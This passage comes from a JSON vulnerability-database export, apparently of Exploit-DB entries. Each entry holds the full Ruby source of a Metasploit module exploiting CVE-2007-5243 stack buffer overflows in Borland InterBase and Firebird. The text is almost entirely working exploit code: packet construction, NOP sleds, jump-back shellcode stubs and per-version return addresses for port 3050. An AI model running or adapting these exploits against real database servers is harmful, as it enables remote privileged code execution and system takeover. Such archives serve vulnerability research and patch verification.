''\r\n\r\n\t\tdpb << [isc_dpb_version1].pack('c')\r\n\r\n\t\tdpb << [isc_dpb_user_name].pack('c')\r\n\t\tdpb << [user.length].pack('c')\r\n\t\tdpb << user\r\n\r\n\t\tdpb << [isc_dpb_password].pack('c')\r\n\t\tdpb << [pass.length].pack('c')\r\n\t\tdpb << pass\r\n\r\n\t\tdpb\r\n\tend\r\n\r\n\t# Calculate buffer padding\r\n\tdef buf_padding(length = '')\r\n\t\tremainder = length.remainder(4)\r\n\t\tpadding = 0\r\n\r\n\t\tif remainder > 0\r\n\t\t\tpadding = (4 - remainder)\r\n\t\tend\r\n\r\n\t\tpadding\r\n\tend\r\n\r\n\tdef exploit_target(target)\r\n\r\n\t\ttarget['Length'].each do |length|\r\n\r\n\t\t\tconnect\r\n\r\n\t\t\t# Create database\r\n\t\t\top_create = 20\r\n\r\n\t\t\t# Extra padding to trigger the exception\r\n\t\t\textra_padding = 1024 * 16\r\n\r\n\t\t\tbuf = ''\r\n\r\n\t\t\t# Operation/packet type\r\n\t\t\tbuf << [op_create].pack('N')\r\n\r\n\t\t\t# Id\r\n\t\t\tbuf << [0].pack('N')\r\n\r\n\t\t\t# Length\r\n\t\t\tbuf << [length + extra_padding].pack('N')\r\n\r\n\t\t\t# Nop block\r\n\t\t\tbuf << make_nops(length - payload.encoded.length - 13)\r\n\r\n\t\t\t# Payload\r\n\t\t\tbuf << payload.encoded\r\n\r\n\t\t\t# Jump back into the nop block\r\n\t\t\tbuf << \"\\xe9\" + [-516].pack('V')\r\n\r\n\t\t\t# Jump back\r\n\t\t\tbuf << \"\\xeb\" + [-7].pack('c')\r\n\r\n\t\t\t# Random alpha data\r\n\t\t\tbuf << rand_text_alpha(2)\r\n\r\n\t\t\t# Target\r\n\t\t\tbuf << [target.ret].pack('V')\r\n\r\n\t\t\t# Random alpha data\r\n\t\t\tbuf << rand_text_alpha(extra_padding)\r\n\r\n\t\t\t# Padding\r\n\t\t\tbuf << \"\\x00\" * buf_padding(length + extra_padding)\r\n\r\n\t\t\t# Database parameter block\r\n\r\n\t\t\t# Create database parameter block\r\n\t\t\tdpb = dpb_create\r\n\r\n\t\t\t# Database parameter block length\r\n\t\t\tbuf << [dpb.length].pack('N')\r\n\r\n\t\t\t# Database parameter block\r\n\t\t\tbuf << dpb\r\n\r\n\t\t\t# Padding\r\n\t\t\tbuf << \"\\x00\" * buf_padding(dpb.length)\r\n\r\n\t\t\tsock.put(buf)\r\n\r\n\t\t\tselect(nil,nil,nil,4)\r\n\r\n\t\t\thandler\r\n\r\n\t\tend\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16432/"}, {"lastseen": "2016-02-01T23:51:57", "description": "Borland InterBase isc_create_database() Buffer Overflow. CVE-2007-5243. Remote exploit for windows platform", "published": "2010-07-03T00:00:00", "type": "exploitdb", "title": "Borland InterBase isc_create_database Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2010-07-03T00:00:00", "id": "EDB-ID:16437", "href": "https://www.exploit-db.com/exploits/16437/", "sourceData": "##\r\n# $Id: ib_isc_create_database.rb 9669 2010-07-03 03:13:45Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::BruteTargets\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t=> 'Borland InterBase isc_create_database() Buffer Overflow',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\r\n\t\t\t\tby sending a specially crafted create request.\r\n\t\t\t},\r\n\t\t\t'Version'\t=> '$Revision: 9669 $',\r\n\t\t\t'Author'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t'ramon',\r\n\t\t\t\t\t'Adriano Lima <adriano@risesecurity.org>',\r\n\t\t\t\t],\r\n\t\t\t'Arch'\t\t=> ARCH_X86,\r\n\t\t\t'Platform'\t=> 'win',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-5243' ],\r\n\t\t\t\t\t[ 'OSVDB', '38606' ],\r\n\t\t\t\t\t[ 'BID', '25917' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged'\t=> true,\r\n\t\t\t'License'\t=> MSF_LICENSE,\r\n\t\t\t'Payload'\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Targets'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Brute Force', { } ],\r\n\t\t\t\t\t# 0x00403d4b pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V8.1.0.257',\r\n\t\t\t\t\t\t{ 'Length' => [ 2116, 2120 ], 'Ret' => 0x00403d4b }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x00403d4d pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V8.0.0.123',\r\n\t\t\t\t\t\t{ 'Length' => [ 2116, 2120 ], 'Ret' => 0x00403d4d }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x00403a5d pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80',\r\n\t\t\t\t\t\t{ 'Length' => [ 2116, 2120 ], 'Ret' => 0x00403a5d }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x004038fd pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V7.0.1.1',\r\n\t\t\t\t\t\t{ 'Length' => [ 2116, 2120 ], 'Ret' => 0x004038fd }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x0040390d pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V6.5.0.28',\r\n\t\t\t\t\t\t{ 'Length' => [ 1332, 1336 ], 'Ret' => 0x0040390d }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x00403901 pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V6.0.1.6',\r\n\t\t\t\t\t\t{ 'Length' => [ 1332, 1336 ], 'Ret' => 0x00403901 }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x004038b1 pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0',\r\n\t\t\t\t\t\t{ 'Length' => [ 1332, 1336 ], 'Ret' => 0x004038b1 }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x00404a10 pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V5.5.0.742',\r\n\t\t\t\t\t\t{ 'Length' => [ 1432, 1436 ], 'Ret' => 0x00404a10 }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x00404a0e pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V5.1.1.680',\r\n\t\t\t\t\t\t{ 'Length' => [ 1336, 1340 ], 'Ret' => 0x00404a0e }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# Debug\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Debug',\r\n\t\t\t\t\t\t{ 'Length' => [ 1336 ], 'Ret' => 0xaabbccdd }\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget'\t=> 0,\r\n\t\t\t'DisclosureDate' => 'Oct 03 2007'\r\n\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(3050)\r\n\t\t\t],\r\n\t\t\tself.class\r\n\t\t)\r\n\r\n\tend\r\n\r\n\tdef exploit_target(target)\r\n\r\n\t\ttarget['Length'].each do |length|\r\n\r\n\t\t\tconnect\r\n\r\n\t\t\t# Create database\r\n\t\t\top_create = 20\r\n\r\n\t\t\tremainder = length.remainder(4)\r\n\t\t\tpadding = 0\r\n\r\n\t\t\tif remainder > 0\r\n\t\t\t\tpadding = (4 - remainder)\r\n\t\t\tend\r\n\r\n\t\t\tbuf = ''\r\n\r\n\t\t\t# Operation/packet type\r\n\t\t\tbuf << [op_create].pack('N')\r\n\r\n\t\t\t# Id\r\n\t\t\tbuf << [0].pack('N')\r\n\r\n\t\t\t# Length\r\n\t\t\tbuf << [length].pack('N')\r\n\r\n\t\t\t# Nop block\r\n\t\t\tbuf << make_nops(length - payload.encoded.length - 13)\r\n\r\n\t\t\t# Payload\r\n\t\t\tbuf << payload.encoded\r\n\r\n\t\t\t# Jump back into the nop block\r\n\t\t\tbuf << \"\\xe9\" + [-1028].pack('V')\r\n\r\n\t\t\t# Jump back\r\n\t\t\tbuf << \"\\xeb\" + [-7].pack('c')\r\n\r\n\t\t\t# Random alpha data\r\n\t\t\tbuf << rand_text_alpha(2)\r\n\r\n\t\t\t# Target\r\n\t\t\tbuf << [target.ret].pack('V')\r\n\r\n\t\t\t# Padding\r\n\t\t\tbuf << \"\\x00\" * padding\r\n\r\n\t\t\t# Database parameter block\r\n\r\n\t\t\t# Length\r\n\t\t\tbuf << [1024].pack('N')\r\n\r\n\t\t\t# Random alpha data\r\n\t\t\tbuf << rand_text_alpha(1024)\r\n\r\n\t\t\tsock.put(buf)\r\n\r\n\t\t\tselect(nil,nil,nil,4)\r\n\r\n\t\t\thandler\r\n\r\n\t\tend\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16437/"}, {"lastseen": "2016-02-01T23:52:23", "description": "Firebird Relational Database isc_attach_database() Buffer Overflow. CVE-2007-5243. Remote exploit for windows platform", "published": "2010-07-03T00:00:00", "type": "exploitdb", "title": "Firebird Relational Database isc_attach_database Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2010-07-03T00:00:00", "id": "EDB-ID:16440", "href": "https://www.exploit-db.com/exploits/16440/", "sourceData": "##\r\n# $Id: fb_isc_attach_database.rb 9669 2010-07-03 03:13:45Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::BruteTargets\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t=> 'Firebird Relational Database isc_attach_database() Buffer Overflow',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\r\n\t\t\t\tby sending a specially crafted create request.\r\n\t\t\t},\r\n\t\t\t'Version'\t=> '$Revision: 9669 $',\r\n\t\t\t'Author'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t'ramon',\r\n\t\t\t\t\t'Adriano Lima <adriano@risesecurity.org>',\r\n\t\t\t\t],\r\n\t\t\t'Arch'\t\t=> ARCH_X86,\r\n\t\t\t'Platform'\t=> 'win',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-5243' ],\r\n\t\t\t\t\t[ 'OSVDB', '38607' ],\r\n\t\t\t\t\t[ 'BID', '25917' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged'\t=> true,\r\n\t\t\t'License'\t=> MSF_LICENSE,\r\n\t\t\t'Payload'\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Targets'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Brute Force', { } ],\r\n\t\t\t\t\t# '\\Device\\HarddiskVolume1\\WINDOWS\\system32\\unicode.nls'\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Firebird WI-V2.0.0.12748 WI-V2.0.1.12855 (unicode.nls)',\r\n\t\t\t\t\t\t{ 'Length' => [ 756 ], 'Ret' => 0x00370b0b }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# Debug\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Debug',\r\n\t\t\t\t\t\t{ 'Length' => [ 756 ], 'Ret' => 0xaabbccdd }\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget'\t=> 1,\r\n\t\t\t'DisclosureDate' => 'Oct 03 2007'\r\n\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(3050)\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\t# Create database parameter block\r\n\tdef dpb_create\r\n\t\tisc_dpb_user_name = 28\r\n\t\tisc_dpb_password = 29\r\n\r\n\t\tisc_dpb_version1 = 1\r\n\r\n\t\tuser = 'SYSDBA'\r\n\t\tpass = 'masterkey'\r\n\r\n\t\tdpb = ''\r\n\r\n\t\tdpb << [isc_dpb_version1].pack('c')\r\n\r\n\t\tdpb << [isc_dpb_user_name].pack('c')\r\n\t\tdpb << [user.length].pack('c')\r\n\t\tdpb << user\r\n\r\n\t\tdpb << [isc_dpb_password].pack('c')\r\n\t\tdpb << [pass.length].pack('c')\r\n\t\tdpb << pass\r\n\r\n\t\tdpb\r\n\tend\r\n\r\n\t# Calculate buffer padding\r\n\tdef buf_padding(length = '')\r\n\t\tremainder = length.remainder(4)\r\n\t\tpadding = 0\r\n\r\n\t\tif remainder > 0\r\n\t\t\tpadding = (4 - remainder)\r\n\t\tend\r\n\r\n\t\tpadding\r\n\tend\r\n\r\n\tdef exploit_target(target)\r\n\r\n\t\ttarget['Length'].each do |length|\r\n\r\n\t\t\tconnect\r\n\r\n\t\t\t# Attach database\r\n\t\t\top_attach = 19\r\n\r\n\t\t\t# Extra padding to trigger the exception\r\n\t\t\textra_padding = 1024 * 16\r\n\r\n\t\t\tbuf = ''\r\n\r\n\t\t\t# Operation/packet type\r\n\t\t\tbuf << [op_attach].pack('N')\r\n\r\n\t\t\t# Id\r\n\t\t\tbuf << [0].pack('N')\r\n\r\n\t\t\t# Length\r\n\t\t\tbuf << [length + extra_padding].pack('N')\r\n\r\n\t\t\t# Nop block\r\n\t\t\tbuf << make_nops(length - payload.encoded.length - 13)\r\n\r\n\t\t\t# Payload\r\n\t\t\tbuf << payload.encoded\r\n\r\n\t\t\t# Jump back into the nop block\r\n\t\t\tbuf << \"\\xe9\" + [-516].pack('V')\r\n\r\n\t\t\t# Jump back\r\n\t\t\tbuf << \"\\xeb\" + [-7].pack('c')\r\n\r\n\t\t\t# Random alpha data\r\n\t\t\tbuf << rand_text_alpha(2)\r\n\r\n\t\t\t# Target\r\n\t\t\tbuf << [target.ret].pack('V')\r\n\r\n\t\t\t# Random alpha data\r\n\t\t\tbuf << rand_text_alpha(extra_padding)\r\n\r\n\t\t\t# Padding\r\n\t\t\tbuf << \"\\x00\" * buf_padding(length + extra_padding)\r\n\r\n\t\t\t# Database parameter block\r\n\r\n\t\t\t# Create database parameter block\r\n\t\t\tdpb = dpb_create\r\n\r\n\t\t\t# Database parameter block length\r\n\t\t\tbuf << [dpb.length].pack('N')\r\n\r\n\t\t\t# Database parameter block\r\n\t\t\tbuf << dpb\r\n\r\n\t\t\t# Padding\r\n\t\t\tbuf << \"\\x00\" * buf_padding(dpb.length)\r\n\r\n\t\t\tsock.put(buf)\r\n\r\n\t\t\tselect(nil,nil,nil,4)\r\n\r\n\t\t\thandler\r\n\r\n\t\tend\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16440/"}, {"lastseen": "2016-02-01T23:53:23", "description": "Borland InterBase isc_attach_database() Buffer Overflow. CVE-2007-5243. Remote exploit for windows platform", "published": "2010-07-03T00:00:00", "type": "exploitdb", "title": "Borland InterBase isc_attach_database Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2010-07-03T00:00:00", "id": "EDB-ID:16447", "href": "https://www.exploit-db.com/exploits/16447/", "sourceData": "##\r\n# $Id: ib_isc_attach_database.rb 9669 2010-07-03 03:13:45Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::BruteTargets\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t=> 'Borland InterBase isc_attach_database() Buffer Overflow',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\r\n\t\t\t\tby sending a specially crafted attach request.\r\n\t\t\t},\r\n\t\t\t'Version'\t=> '$Revision: 9669 $',\r\n\t\t\t'Author'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t'ramon',\r\n\t\t\t\t\t'Adriano Lima <adriano@risesecurity.org>',\r\n\t\t\t\t],\r\n\t\t\t'Arch'\t\t=> ARCH_X86,\r\n\t\t\t'Platform'\t=> 'win',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-5243' ],\r\n\t\t\t\t\t[ 'OSVDB', '38607' ],\r\n\t\t\t\t\t[ 'BID', '25917' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged'\t=> true,\r\n\t\t\t'License'\t=> MSF_LICENSE,\r\n\t\t\t'Payload'\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Targets'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Brute Force', { } ],\r\n\t\t\t\t\t# 0x00403d4b pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V8.1.0.257',\r\n\t\t\t\t\t\t{ 'Length' => [ 3136, 3140 ], 'Ret' => 0x00403d4b }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x00403d4d pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V8.0.0.123',\r\n\t\t\t\t\t\t{ 'Length' => [ 3136, 3140 ], 'Ret' => 0x00403d4d }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x00403a5d pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80',\r\n\t\t\t\t\t\t{ 'Length' => [ 3136, 3140 ], 'Ret' => 0x00403a5d }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x004038fd pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V7.0.1.1',\r\n\t\t\t\t\t\t{ 'Length' => [ 3136, 3140 ], 'Ret' => 0x004038fd }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x0040390d pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V6.5.0.28',\r\n\t\t\t\t\t\t{ 'Length' => [ 1328, 1332 ], 'Ret' => 0x0040390d }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x00403901 pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V6.0.1.6',\r\n\t\t\t\t\t\t{ 'Length' => [ 1328, 1332 ], 'Ret' => 0x00403901 }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x004038b1 pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0',\r\n\t\t\t\t\t\t{ 'Length' => [ 1328, 1332 ], 'Ret' => 0x004038b1 }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x00404a10 pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V5.5.0.742',\r\n\t\t\t\t\t\t{ 'Length' => [ 1428, 1432 ], 'Ret' => 0x00404a10 }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x00404a0e pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V5.1.1.680',\r\n\t\t\t\t\t\t{ 'Length' => [ 1332, 1336 ], 'Ret' => 0x00404a0e }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# Debug\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Debug',\r\n\t\t\t\t\t\t{ 'Length' => [ 1332 ], 'Ret' => 0xaabbccdd }\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget'\t=> 0,\r\n\t\t\t'DisclosureDate' => 'Oct 03 2007'\r\n\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(3050)\r\n\t\t\t],\r\n\t\t\tself.class\r\n\t\t)\r\n\r\n\tend\r\n\r\n\tdef exploit_target(target)\r\n\r\n\t\ttarget['Length'].each do |length|\r\n\r\n\t\t\tconnect\r\n\r\n\t\t\t# Attach database\r\n\t\t\top_attach = 19\r\n\r\n\t\t\tremainder = length.remainder(4)\r\n\t\t\tpadding = 0\r\n\r\n\t\t\tif remainder > 0\r\n\t\t\t\tpadding = (4 - remainder)\r\n\t\t\tend\r\n\r\n\t\t\tbuf = ''\r\n\r\n\t\t\t# Operation/packet type\r\n\t\t\tbuf << [op_attach].pack('N')\r\n\r\n\t\t\t# Id\r\n\t\t\tbuf << [0].pack('N')\r\n\r\n\t\t\t# Length\r\n\t\t\tbuf << [length].pack('N')\r\n\r\n\t\t\t# Nop block\r\n\t\t\tbuf << make_nops(length - payload.encoded.length - 13)\r\n\r\n\t\t\t# Payload\r\n\t\t\tbuf << payload.encoded\r\n\r\n\t\t\t# Jump back into the nop block\r\n\t\t\tbuf << \"\\xe9\" + [-1028].pack('V')\r\n\r\n\t\t\t# Jump back\r\n\t\t\tbuf << \"\\xeb\" + [-7].pack('c')\r\n\r\n\t\t\t# Random alpha data\r\n\t\t\tbuf << rand_text_alpha(2)\r\n\r\n\t\t\t# Target\r\n\t\t\tbuf << [target.ret].pack('V')\r\n\r\n\t\t\t# Padding\r\n\t\t\tbuf << \"\\x00\" * padding\r\n\r\n\t\t\t# Database parameter block\r\n\r\n\t\t\t# Length\r\n\t\t\tbuf << [1024].pack('N')\r\n\r\n\t\t\t# Random alpha data\r\n\t\t\tbuf << rand_text_alpha(1024)\r\n\r\n\t\t\tsock.put(buf)\r\n\r\n\t\t\tselect(nil,nil,nil,4)\r\n\r\n\t\t\thandler\r\n\r\n\t\tend\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16447/"}, {"lastseen": "2016-02-01T23:53:41", "description": "Borland InterBase SVC_attach() Buffer Overflow. CVE-2007-5243. Remote exploit for windows platform", "published": "2010-07-03T00:00:00", "type": "exploitdb", "title": "Borland InterBase SVC_attach Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2010-07-03T00:00:00", "id": "EDB-ID:16449", "href": "https://www.exploit-db.com/exploits/16449/", "sourceData": "##\r\n# $Id: ib_svc_attach.rb 9669 2010-07-03 03:13:45Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::BruteTargets\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t=> 'Borland InterBase SVC_attach() Buffer Overflow',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\r\n\t\t\t\tby sending a specially crafted service attach request.\r\n\t\t\t},\r\n\t\t\t'Version'\t=> '$Revision: 9669 $',\r\n\t\t\t'Author'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t'ramon',\r\n\t\t\t\t\t'Adriano Lima <adriano@risesecurity.org>',\r\n\t\t\t\t],\r\n\t\t\t'Arch'\t\t=> ARCH_X86,\r\n\t\t\t'Platform'\t=> 'win',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-5243' ],\r\n\t\t\t\t\t[ 'OSVDB', '38605' ],\r\n\t\t\t\t\t[ 'BID', '25917' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged'\t=> true,\r\n\t\t\t'License'\t=> MSF_LICENSE,\r\n\t\t\t'Payload'\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Targets'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Brute Force', { } ],\r\n\t\t\t\t\t# 0x00403d4b pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V8.1.0.257',\r\n\t\t\t\t\t\t{ 'Length' => [ 3660, 3664 ], 'Ret' => 0x00403d4b }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x00403d4d pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V8.0.0.123',\r\n\t\t\t\t\t\t{ 'Length' => [ 3660, 3664 ], 'Ret' => 0x00403d4d }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x00403a5d pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80',\r\n\t\t\t\t\t\t{ 'Length' => [ 3660, 3664 ], 'Ret' => 0x00403a5d }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x004038fd pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V7.0.1.1',\r\n\t\t\t\t\t\t{ 'Length' => [ 3660, 3664 ], 'Ret' => 0x004038fd }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x0040390d pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V6.5.0.28',\r\n\t\t\t\t\t\t{ 'Length' => [ 2116, 2120], 'Ret' => 0x0040390d }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# 0x00403901 pop esi; pop ebp; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Borland InterBase WI-V6.0.1.6',\r\n\t\t\t\t\t\t{ 'Length' => [ 2116, 2120 ], 'Ret' => 0x00403901 